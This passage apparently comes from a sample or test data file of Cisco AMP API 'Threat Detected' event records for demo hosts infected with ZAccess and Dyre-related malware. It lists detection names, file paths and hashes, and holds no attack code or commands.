Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255919035252763","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":846000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215109","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":839000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215107","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":790000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215108","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab-temp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab-temp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jar_cache4855455380559478946.tmp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\jar_cache4855455380559478946.tmp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255906150351000,"timestamp":1610705118,"timestamp_nanoseconds":24000000,"date":"2021-01-15T10:05:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255906150350874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":715000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084315","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084314","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":677000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084313","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":501000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364373045149720","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1089625888-3054005746-3039903294-1000\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":4016,"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":441000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149719","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":149000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182417","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149717","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149716","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182419","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":923000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182418","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":740000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182415","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":717000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182414","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} 